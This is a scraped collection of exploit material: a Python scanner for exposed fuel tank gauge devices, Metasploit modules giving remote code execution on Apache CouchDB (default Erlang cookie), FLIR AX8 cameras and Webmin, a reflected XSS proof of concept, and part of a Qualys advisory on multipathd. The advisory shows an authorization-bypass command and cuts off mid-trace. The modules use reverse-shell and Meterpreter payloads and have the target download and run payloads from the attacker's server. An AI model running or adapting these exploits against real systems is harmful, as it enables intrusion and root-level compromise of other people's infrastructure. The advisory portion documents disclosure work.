<pre><code>#!/usr/bin/env python3<br /><br /> <br />import time<br />import socket <br />with open("/tmp/ATG_SCAN.txt",'r') as atg_file:<br /> for line in atg_file.read().splitlines():<br /> try:<br /> atg_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> port = 10001<br /> search_str = 'IN-TANK INVENTORY' <br /> msg = str('\x01' + 'I20100' + '\n').encode('ascii')<br /> atg_socket.connect((line, port))<br /> atg_socket.send(msg)<br /> time.sleep(.25)<br /> response = atg_socket.recv(1024).decode()<br /> if search_str in response:<br /> with open("/tmp/ATG_DEVICES.txt", 'a') as file2:<br /> file2.write(line + "\t ->\tATG Device\n")<br /> else:<br /> continue<br /> atg_socket.close() <br /> except:<br /> pass <br />atg_file.close()<br /> <br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Retry<br /> include Msf::Exploit::Powershell<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> require 'msf/core/exploit/powershell'<br /> require 'digest'<br /><br /> # Constants required for communicating over the Erlang protocol defined here:<br /> # https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html<br /> EPM_NAME_CMD = "\x00\x01\x6e".freeze<br /> NAME_MSG = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA".freeze<br /> CHALLENGE_REPLY = "\x00\x15r\x01\x02\x03\x04".freeze<br /> CTRL_DATA = "\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex".freeze<br /> COOKIE = 'monster'.freeze<br /> COMMAND_PREFIX = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k".freeze<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache Couchdb Erlang RCE',<br /> 'Description' => %q{<br /> In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without<br /> authenticating and gain admin privileges.<br /> },<br /> 'Author' => [<br /> 'Milton Valencia (wetw0rk)', # Erlang Cookie RCE discovery<br /> '1F98D', # Erlang Cookie RCE exploit<br /> 'Konstantin Burov', # Apache CouchDB Erlang Cookie exploit<br /> '_sadshade', # Apache CouchDB Erlang Cookie exploit<br /> 'jheysel-r7', # Msf Module<br /> ],<br /> 'References' => [<br /> [ 'EDB', '49418' ],<br /> [ 'URL', 'https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit'],<br /> [ 'CVE', '2022-24706'],<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['win', 'linux'],<br /> 'Payload' => {<br /> 'MaxSize' => 60000 # Due to the 16-bit nature of the cmd in the compile_cmd method<br /> },<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_openssl'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => :wget,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :win_dropper,<br /> 'CmdStagerFlavor' => :certutil,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'PowerShell Stager',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :psh_stager,<br /> 'CmdStagerFlavor' => :certutil,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2022-01-21',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> ),<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(4369)<br /> ]<br /> )<br /> end<br /><br /> def check<br /> erlang_ports = get_erlang_ports<br /> # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.<br /> return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?<br /><br /> erlang_ports.each do |erlang_port|<br /> # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been<br /> # successful and the target as well as the specific socket used in this instance is vulnerable<br /> sock = connect_to_erlang_server(erlang_port.to_i)<br /> if sock.instance_of?(Socket)<br /> @vulnerable_socket = sock<br /> return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')<br /> else<br /> next<br /> end<br /> end<br /> Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be a patched')<br /> end<br /><br /> # Connect to the Erlang Port Mapper Daemon to collect port numbers of running Erlang servers<br /> #<br /> # @return [Array] An array of port numbers for discovered Erlang Servers.<br /> def get_erlang_ports<br /> erlang_ports = []<br /> begin<br /> print_status("Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: #{datastore['RHOSTS']}:#{datastore['RPORT']}...")<br /> connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })<br /> # request Erlang nodes<br /> sock.put(EPM_NAME_CMD)<br /> sleep datastore['WfsDelay']<br /> res = sock.get_once<br /> unless res && res.include?("\x00\x00\x11\x11name couchdb")<br /> print_error('Did not find any Erlang nodes')<br /> return erlang_ports<br /> end<br /><br /> print_status('Successfully found EDPM socket')<br /> res.each_line do |line|<br /> erlang_ports << line.match(/\s(\d+$)/)[0]<br /> end<br /> rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e<br /> print_error("Error connecting to EDPM: #{e.class} #{e}")<br /> disconnect<br /> return erlang_ports<br /> end<br /> erlang_ports<br /> end<br /><br /> # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the<br /> # default erlang cookie value in Apache CouchDB installations before 3.2.2<br /> #<br /> # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server<br /> def connect_to_erlang_server(erlang_port)<br /> print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')<br /> connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })<br /> print_status('Connection successful')<br /> challenge = retry_until_truthy(timeout: 60) do<br /> sock.put(NAME_MSG)<br /> sock.get_once(5) # ok message<br /> sock.get_once<br /> end<br /> # The expected successful response from the target should start with \x00\x1C<br /> unless challenge && challenge.include?("\x00\x1C")<br /> print_error('Connecting to the Erlang server was unsuccessful')<br /> return<br /> end<br /><br /> challenge = challenge[9..12].unpack('N*')[0]<br /> challenge_reply = "\x00\x15r\x01\x02\x03\x04"<br /> md5 = Digest::MD5.new<br /> md5.update(COOKIE + challenge.to_s)<br /> challenge_reply << [md5.hexdigest].pack('H*')<br /> sock.put(challenge_reply)<br /> sleep datastore['WfsDelay']<br /> challenge_response = sock.get_once<br /><br /> if challenge_response.nil?<br /> print_error('Authentication was unsuccessful')<br /> return<br /> end<br /> print_status('Erlang challenge and response completed successfully')<br /><br /> sock<br /> rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e<br /> print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")<br /> disconnect<br /> return<br /> end<br /><br /> def compile_cmd(cmd)<br /> msg = ''<br /> msg << COMMAND_PREFIX<br /> msg << [cmd.length].pack('S>')<br /> msg << cmd<br /> msg << "jw\x04user"<br /> payload = ("\x70" + CTRL_DATA + msg)<br /> ([payload.size].pack('N*') + payload)<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> payload = compile_cmd(cmd)<br /> print_status('Sending payload... ')<br /> opts[:sock].put(payload)<br /> sleep datastore['WfsDelay']<br /> end<br /><br /> def exploit_socket(sock)<br /> case target['Type']<br /> when :unix_cmd, :win_cmd<br /> execute_command(payload.encoded, { sock: sock })<br /> when :linux_dropper, :win_dropper<br /> execute_cmdstager({ sock: sock })<br /> when :psh_stager<br /> execute_command(cmd_psh_payload(payload.encoded, payload_instance.arch.first), { sock: sock })<br /> else<br /> fail_with(Failure::BadConfig, 'Invalid target specified')<br /> end<br /> end<br /><br /> def exploit<br /> # If the check method has already been run, use the vulnerable socket that has already been identified<br /> if @vulnerable_socket<br /> exploit_socket(@vulnerable_socket)<br /> else<br /> erlang_ports = get_erlang_ports<br /> fail_with(Failure::BadConfig, 'This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)<br /><br /> erlang_ports.each do |erlang_port|<br /> sock = connect_to_erlang_server(erlang_port.to_i)<br /> next unless sock.instance_of?(Socket)<br /><br /> exploit_socket(sock)<br /> end<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/stopwatch'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'FLIR AX8 unauthenticated RCE',<br /> 'Description' => %q{<br /> All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.<br /> This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter<br /> in the res.php endpoint.<br /><br /> This module uses the vulnerability to upload and execute payloads gaining root privileges.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher<br /> 'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher<br /> 'h00die-gr3y' # metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-37061'],<br /> ['PACKETSTORM', '168114'],<br /> ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],<br /> ],<br /> 'DisclosureDate' => '2022-08-19',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_ARMLE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_netcat'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'curl', 'printf' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80,<br /> 'SSL' => false<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> action_id = rand(1..40)<br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',<br /> 'uri' => normalize_uri(target_uri.path, 'res.php'),<br /> 'vars_post' => {<br /> 'action' => 'alarm',<br /> 'id' => "#{action_id};#{cmd}"<br /> }<br /> })<br /> rescue StandardError => e<br /> elog("#{peer} - Communication error occurred: #{e.message}", error: e)<br /> print_error("Communication error occurred: #{e.message}")<br /> return nil<br /> end<br /><br /> # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution<br /> def check<br /> print_status("Checking if #{peer} can be exploited!")<br /> sleep_time = rand(5..10)<br /> print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")<br /> res, elapsed_time = Rex::Stopwatch.elapsed_time do<br /> execute_command("sleep #{sleep_time}")<br /> end<br /><br /> return Exploit::CheckCode::Unknown('No response received from the target!') unless res<br /><br /> print_status("Elapsed time: #{elapsed_time} seconds.")<br /> return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time<br /><br /> CheckCode::Vulnerable('Successfully tested command injection.')<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :unix_cmd<br /> print_status("Executing #{target.name} with #{payload.encoded}")<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> print_status("Executing #{target.name}")<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /> include Msf::Exploit::Remote::HTTP::Webmin<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Webmin File Manager RCE',<br /> 'Description' => %q{<br /> In Webmin version 1.984, any authenticated low privilege user without access rights to<br /> the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and<br /> changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those<br /> functionalities in the file manager.<br /> },<br /> 'Author' => [<br /> 'faisalfs10x', # discovery<br /> 'jheysel-r7' # module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit<br /> [ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit<br /> [ 'CVE', '2022-0824']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'linux',<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Automatic (Unix In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_memory,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2022-02-26',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'The default webmin port', 10000]),<br /> OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]),<br /> OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> webmin_check('0', '1.984')<br /> end<br /><br /> def login<br /> webmin_login(datastore['USERNAME'], datastore['PASSWORD'])<br /> end<br /><br /> def download_remote_url<br /> print_status('Fetching payload from HTTP server')<br /><br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',<br /> 'headers' => {<br /> 'Accept' => 'application/json, text/javascript, */*; q=0.01',<br /> 'Accept-Encoding' => 'gzip, deflate',<br /> 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',<br /> 'X-Requested-With' => 'XMLHttpRequest',<br /> 'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '/filemin/?xnavigation=1'<br /> },<br /> 'vars_get' => {<br /> 'module' => 'filemin'<br /> }<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res<br /> fail_with(Failure::BadConfig, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!')<br /> register_file_for_cleanup("/usr/share/webmin/#{@file_name}")<br /> end<br /><br /> def modify_permissions<br /> print_status('Modifying the permissions of the uploaded payload to 0755')<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'headers' => {<br /> 'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + 'filemin/?xnavigation=1'<br /> },<br /> 'vars_get' => {<br /> 'module' => 'filemin',<br /> 'page' => '1',<br /> 'paginate' => '30'<br /> },<br /> 'vars_post' => {<br /> 'name' => @file_name,<br /> 'perms' => '0755',<br /> 'applyto' => '1',<br /> 'path' => '/usr/share/webmin'<br /> }<br /> })<br /> fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the upload .cgi payload') unless res && res.code == 302<br /> end<br /><br /> def exec_revshell<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 'uri' => normalize_uri(datastore['TARGETURI'], @file_name),<br /> 'headers' => {<br /> 'Connection' => 'keep-alive'<br /> }<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500<br /> end<br /><br /> def on_request_uri(cli, request)<br /> print_status("Request '#{request.method} #{request.uri}'")<br /> print_status('Sending payload ...')<br /> send_response(cli, payload.encoded,<br /> 'Content-Type' => 'application/octet-stream')<br /> end<br /><br /> def exploit<br /> start_service<br /> @file_name = (get_resource.gsub('/', '') + '.cgi')<br /> cookie = login<br /> fail_with(Failure::BadConfig, 'Unsuccessful login attempt with creds') if cookie.empty?<br /> print_status('Downloading remote url')<br /> download_remote_url<br /> print_status('Finished downloading remote url')<br /> modify_permissions<br /> exec_revshell<br /> end<br />end<br /></code></pre>
<pre><code>## Title: Ecommerce-CodeIgniter-Bootstrap-1.0 Cross-site scripting (reflected) RCE<br />## Author: nu11secur1ty<br />## Date: 10.29.2022<br />## Vendor: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap<br />## Software: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/archive/refs/heads/master.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap<br /><br />## Description:<br />The value of the search_in_title request parameter is copied into the<br />value of an HTML tag attribute which is encapsulated in double<br />quotation marks.<br />The payload f5iun"><script>alert(1)</script>h4s83 was submitted in the<br />search_in_title parameter.<br />The malicious user can use this vulnerability to exploit every user of<br />this system to make them a bot machine and etc.<br /><br />[+] Exploit:<br /><br />```POST<br />GET /Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=f5iun"><a%20href="https://pornhub.com/"%20target="_blank"%20rel="noopener%20nofollow%20ugc">%20<img%20src="https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif??token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1"%20style="border:1px%20solid%20black;max-width:100%;"%20alt="Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!">%20</a>h4s83&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592<br />HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: ci_session=vndq7brjjjf1an7k6s3q913bsqjf03it<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br /><br /># Proof and Exploit:<br />[href](https://streamable.com/y3q67i)<br /><br /></code></pre>
<pre><code><br />Qualys Security Advisory<br /><br />Leeloo Multipath: Authorization bypass and symlink attack in multipathd<br />(CVE-2022-41974 and CVE-2022-41973)<br /><br /><br />========================================================================<br />Contents<br />========================================================================<br /><br />Summary<br />CVE-2022-41974: Authorization bypass<br />CVE-2022-41973: Symlink attack<br />Acknowledgments<br />Timeline<br /><br /><br />========================================================================<br />Summary<br />========================================================================<br /><br />We discovered two local vulnerabilities (an authorization bypass and a<br />symlink attack) in multipathd, a daemon that is running as root in the<br />default installation of (for example) Ubuntu Server:<br /><br />https://ubuntu.com/server/docs/device-mapper-multipathing-introduction<br />https://github.com/opensvc/multipath-tools<br /><br />We combined these two vulnerabilities with a third vulnerability, in<br />another package that is also installed by default on Ubuntu Server, and<br />obtained full root privileges on Ubuntu Server 22.04; other releases are<br />probably also exploitable. We will publish this third vulnerability, and<br />the complete details of this local privilege escalation, in an upcoming<br />advisory.<br /><br />The authorization bypass (CVE-2022-41974) was introduced in February<br />2017 (version 0.7.0) by commit 9acda0c ("Perform socket client uid check<br />on IPC commands"), but earlier versions perform no authorization checks<br />at all: any unprivileged local user can issue any privileged command to<br />multipathd.<br /><br />The symlink attack (CVE-2022-41973) was introduced in May 2018 (version<br />0.7.7) by commit 65d0a63 ("functions to indicate mapping failure in<br />/dev/shm"); the vulnerable code was hardened significantly in May 2020<br />(version 0.8.5) by commit 40ee3ea ("simplify failed wwid code"), but it<br />remains exploitable nonetheless.<br /><br /><br />========================================================================<br />CVE-2022-41974: Authorization bypass<br />========================================================================<br /><br />The multipathd daemon listens for client connections on an abstract Unix<br />socket (conveniently, the multipathd binary itself can act as a client,<br />if executed with non-option arguments; we use this feature extensively<br />in this advisory to connect and send commands to the multipathd daemon):<br /><br />------------------------------------------------------------------------<br />$ ps -ef | grep 'multipath[d]'<br />root 377 1 0 13:55 ? 00:00:00 /sbin/multipathd -d -s<br /><br />$ ss -l -x | grep 'multipathd'<br />u_str LISTEN 0 4096 @/org/kernel/linux/storage/multipathd 18105<br />------------------------------------------------------------------------<br /><br />The commands sent by a client to multipathd are composed of keywords,<br />and internally, each keyword is identified by a different bit; for<br />example, "list" is 1 (1<<0), "add" is 2 (1<<1), and "path" (which<br />requires a parameter) is 65536 (1<<16):<br /><br />------------------------------------------------------------------------<br />155 load_keys (void)<br />...<br />163 r += add_key(keys, "list", LIST, 0);<br />164 r += add_key(keys, "show", LIST, 0);<br />165 r += add_key(keys, "add", ADD, 0);<br />...<br />183 r += add_key(keys, "path", PATH, 1);<br />------------------------------------------------------------------------<br /> 53 #define LIST (1ULL << __LIST)<br /> 54 #define ADD (1ULL << __ADD)<br /> ..<br /> 69 #define PATH (1ULL << __PATH)<br />------------------------------------------------------------------------<br /> 6 enum {<br /> 7 __LIST, /* 0 */<br /> 8 __ADD,<br /> ..<br /> 23 __PATH,<br />------------------------------------------------------------------------<br /><br />In turn, each command is associated with a handler (a C function) by its<br />fingerprint -- the bitwise OR of its constituent keywords; for example,<br />the command "list path PARAM" is associated with cli_list_path() by the<br />fingerprint 65537 (LIST+PATH=1+65536), and the command "add path PARAM"<br />is associated with cli_add_path() by the fingerprint 65538<br />(ADD+PATH=2+65536):<br /><br />------------------------------------------------------------------------<br />1522 void init_handler_callbacks(void)<br />....<br />1527 set_handler_callback(LIST+PATH, cli_list_path);<br />....<br />1549 set_handler_callback(ADD+PATH, cli_add_path);<br />------------------------------------------------------------------------<br />321 static uint64_t<br />322 fingerprint(const struct _vector *vec)<br />...<br />325 uint64_t fp = 0;<br />...<br />331 vector_foreach_slot(vec, kw, i)<br />332 fp += kw->code;<br />333 <br />334 return fp;<br />------------------------------------------------------------------------<br /> 89 static struct handler *<br /> 90 find_handler (uint64_t fp)<br /> ..<br /> 95 vector_foreach_slot (handlers, h, i)<br /> 96 if (h->fingerprint == fp)<br /> 97 return h;<br /> 98 <br /> 99 return NULL;<br />------------------------------------------------------------------------<br /><br />When multipathd receives a command from a client, it first performs an<br />authentication check and an authorization check (both at line 491):<br /><br />------------------------------------------------------------------------<br />431 static int client_state_machine(struct client *c, struct vectors *vecs,<br />...<br />485 case CLT_PARSE:<br />486 c->error = parse_cmd(c);<br />487 if (!c->error) {<br />...<br />491 if (!c->is_root && kw->code != LIST) {<br />492 c->error = -EPERM;<br />...<br />495 }<br />496 }<br />497 if (c->error)<br />...<br />501 else<br />502 set_client_state(c, CLT_WORK);<br />...<br />522 case CLT_WORK:<br />523 c->error = execute_handler(c, vecs);<br />------------------------------------------------------------------------<br /><br />- Authentication: if the client's UID (obtained from SO_PEERCRED) is 0<br /> (i.e., if is_root is true), then the client is privileged; otherwise,<br /> it is unprivileged.<br /><br />- Authorization: if the client is privileged, it is allowed to execute<br /> any commands; otherwise, only unprivileged LIST commands are allowed<br /> (i.e., commands whose first keyword is either "list" or "show").<br /><br />Attentive readers may have noticed that multipathd does not, in fact,<br />calculate the fingerprint of a command by bitwise-ORing its constituent<br />keywords, but by arithmetic-ADDing them (at line 332). While these two<br />operations are equivalent if no keyword is repeated, we (attackers) can<br />send a seemingly unprivileged command (whose first keyword is "list")<br />but whose fingerprint matches a privileged command (by repeating the<br />"list" keyword): we can exploit this flaw to bypass multipathd's<br />authorization check.<br /><br />For example, we are not allowed to execute "add path PARAM" (whose<br />fingerprint is 2+65536=65538) because the first keyword is not "list",<br />but we are allowed to execute the equivalent "list list path PARAM"<br />(whose fingerprint is also 1+1+65536=65538, instead of 1|1|65536=65537)<br />because the first keyword is "list" (the multipathd daemon below replies<br />"blacklisted" because PARAM is an invalid path, not because the command<br />is denied):<br /><br />------------------------------------------------------------------------<br />$ multipathd add path PARAM<br />permission deny: need to be root<br /><br />$ multipathd list list path PARAM<br />blacklisted<br />------------------------------------------------------------------------<br /><br />This authorization bypass greatly enlarges the attack surface of<br />multipathd: 34 privileged command handlers become available to local<br />attackers, in addition to the 23 unprivileged command handlers that are<br />normally available. We audited only a few of these command handlers,<br />because we quickly discovered a low-hanging vulnerability (a symlink<br />attack) in one of them.<br /><br /><br />========================================================================<br />CVE-2022-41973: Symlink attack<br />========================================================================<br /><br />multipathd operates insecurely, as root, in /dev/shm (a sticky,<br />world-writable directory similar to /tmp). The vulnerable code (in<br />mark_failed_wwid()) may be executed during the normal lifetime of<br />multipathd, but a local attacker can force its execution by exploiting<br />the authorization bypass CVE-2022-41974; for example, by adding a<br />"whitelisted, unmonitored" device to multipathd:<br /><br />------------------------------------------------------------------------<br />$ multipathd list devices | grep 'whitelisted, unmonitored'<br /> sda1 devnode whitelisted, unmonitored<br /> ...<br /><br />$ multipathd list list path sda1<br />fail<br />------------------------------------------------------------------------<br /><br />This command, which is equivalent to "add path sda1", results in the<br />following system-call trace (strace) of the multipathd daemon:<br /><br />------------------------------------------------------------------------<br />386 openat(AT_FDCWD, "/dev/shm/multipath/failed_wwids", O_RDONLY|O_DIRECTORY) = -1 ENOENT (No such file or directory)<br />387 mkdir("/dev", 0700) = -1 EEXIST (File exists)<br />388 mkdir("/dev/shm", 0700) = -1 EEXIST (File exists)<br />389 mkdir("/dev/shm/multipath", 0700) = 0<br />390 mkdir("/dev/shm/multipath/failed_wwids", 0700) = 0<br />391 openat(AT_FDCWD, "/dev/shm/multipath/failed_wwids", O_RDONLY|O_DIRECTORY) = 12<br />392 getpid() = 375<br />393 openat(12, "VBOX_HARDDISK_VB60265ca5-df119cb6.177", O_RDONLY|O_CREAT|O_EXCL, 0400) = 13<br />394 close(13) = 0<br />395 linkat(12, "VBOX_HARDDISK_VB60265ca5-df119cb6.177", 12, "VBOX_HARDDISK_VB60265ca5-df119cb6", 0) = 0<br />396 unlinkat(12, "VBOX_HARDDISK_VB60265ca5-df119cb6.177", 0) = 0<br />397 